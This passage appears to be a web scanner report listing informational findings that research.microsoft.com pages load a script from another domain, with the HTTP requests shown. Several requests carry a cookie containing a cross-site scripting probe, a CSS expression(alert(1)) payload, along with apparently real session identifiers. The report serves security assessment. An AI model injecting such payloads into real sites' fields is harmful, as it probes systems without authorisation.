Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

18.33. http://research.microsoft.com/en-us/about/brochure-2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-2.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-2.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.34. http://research.microsoft.com/en-us/about/brochure-3.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-3.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-3.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.35. http://research.microsoft.com/en-us/about/brochure-4.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-4.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-4.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.36. http://research.microsoft.com/en-us/about/brochure-5.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-5.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-5.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.37. http://research.microsoft.com/en-us/about/brochure-6.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-6.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-6.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.38. http://research.microsoft.com/en-us/about/brochure-7.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-7.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-7.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.39. http://research.microsoft.com/en-us/about/brochure-8.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-8.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-8.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.40. http://research.microsoft.com/en-us/about/brochure-9.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/brochure-9.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/brochure-9.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.41. http://research.microsoft.com/en-us/about/contactus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/contactus.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/contactus.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.42. http://research.microsoft.com/en-us/about/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.43. http://research.microsoft.com/en-us/about/directors.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/directors.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/directors.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/research/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

18.44. http://research.microsoft.com/en-us/about/feature/downloads.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/feature/downloads.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/feature/downloads.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.45. http://research.microsoft.com/en-us/about/paperawards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/about/paperawards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/about/paperawards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.46. http://research.microsoft.com/en-us/collaboration/about/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/about/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.47. http://research.microsoft.com/en-us/collaboration/about/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/events.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/about/events.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.48. http://research.microsoft.com/en-us/collaboration/about/projects.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/projects.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/about/projects.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.49. http://research.microsoft.com/en-us/collaboration/about/summits.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/about/summits.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/about/summits.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.50. http://research.microsoft.com/en-us/collaboration/awards/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/awards/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/collaboration/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DMicrosoft%252520Research%252520Connections%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1023%2526ot%253DA

Response

18.51. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/fellows-women.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/awards/fellows-women.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.52. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/fellowships.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/awards/fellowships.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.53. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/awards/opportunities.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/awards/opportunities.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.54. http://research.microsoft.com/en-us/collaboration/bg_txt.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/bg_txt.png

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/bg_txt.png HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/collaboration/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:05:29 GMT
Content-Length: 59520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.55. http://research.microsoft.com/en-us/collaboration/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/jobs/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DCareers%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1020%2526ot%253DA

Response

18.56. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/cs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/focus/cs/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.57. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/e3/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/focus/e3/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.58. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/education/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/collaboration/focus/education/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.59. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/collaboration/focus/escience/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js
